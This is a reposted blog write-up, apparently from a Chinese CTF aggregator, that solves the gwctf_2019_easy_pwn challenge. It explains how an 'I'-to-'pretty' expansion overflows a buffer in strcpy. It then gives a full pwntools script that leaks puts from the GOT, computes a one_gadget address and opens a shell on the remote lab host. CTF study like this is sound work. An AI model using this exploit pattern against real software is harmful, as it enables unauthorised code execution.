【pwn】gwctf_2019_easy_pwn - 代码天地

【pwn】gwctf_2019_easy_pwn

其他 2020-08-04 10:31:38 阅读次数: 0

例行检查
在这里插入图片描述分析程序，这个程序是c++写的。在往s中read的时候大小没有问题，但是程序在下面将字符"I"替换成了"pretty"，最后在strcpy的时候发生了溢出，没有PIE和canary直接利用即可。

from pwn import *

io=remote('node3.buuoj.cn','27671')
puts_plt=0x8048DC0
puts_got=0x804C068
main=0x8049091
pl='I'*16+p32(puts_plt)+p32(main)+p32(puts_got)
io.send(pl)
io.recvuntil('pretty'*16)
io.recv(12)
puts_add=u32(io.recv(4))
print(hex(puts_add))
one_gadget=puts_add-0x05f140+0x5f066
#sys=puts_add-0x24800
#sh=puts_add+0xf9eeb
#pl2='I'*16+p32(sys)+'dead'+p32(sh)
pl2='I'*16+p32(one_gadget)
io.send(pl2)

io.interactive()

猜你喜欢

转载自blog.csdn.net/github_36788573/article/details/103463024

【pwn】gwctf_2019_easy_pwn

【pwn】roarctf_2019_easy_pwn

roarctf_2019_easy_pwn

（PWN）NCTF2019 -- easy rop -- writeup

【Pwn】NCTF2019 easy_rop

【Pwn】NCTF2019 easy_heap

pwn

Nctf2019 pwn

ZJCTF 2019 Pwn

【Pwn】SWPUCTF_2019_login

【Pwn】NCTF2019 pwn me 100 years! (Ⅲ)

[BUUCTF]PWN——[第五空间2019 决赛]PWN5

pwn-pwn4

pwn-pwn2

Pwn-pwn-200

安恒1月赛2019 PWN

护网杯2019 mergeheap --pwn

nsctf_online_2019_pwn2

【BUUCTF - PWN】ciscn_2019_c_1

【BUUCTF - PWN】ciscn_2019_n_1

【BUUCTF - PWN】ciscn_2019_n_8

【BUUCTF - PWN】ciscn_2019_en_2

【pwn】SWPUCTF_2019_p1KkHeap

【pwn】 roarctf_2019_realloc_magic

【pwn】 [极客大挑战 2019]Not Bad

【pwn】 ciscn_2019_s_4

【pwn】ciscn_2019_s_3

【pwn】ciscn_2019_es_2

【pwn】 ciscn_2019_final_3

[BUUCTF-pwn]——[OGeek2019]babyrop

今日推荐

中国码农的“35岁魔咒”

蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版，免费下载

Arc Browser for Windows 1.0 正式 GA

90后程序员开发视频搬运软件、不到一年获利超 700 万，结局很刑！

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

周排行

[编程题]学英语

[codeforces 1288A] Deadline 约数+模

Python的web开发

Docker在Centos 7上的部署

python编码

解决Ubuntu16.04 fatal error: json/json.h: No such file or directory

mysql并发插入

rest接口如何适应jsonp的方案

linux 终端上网设置

高数——等号两边同时求导、积分的解释

每日归档

更多

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)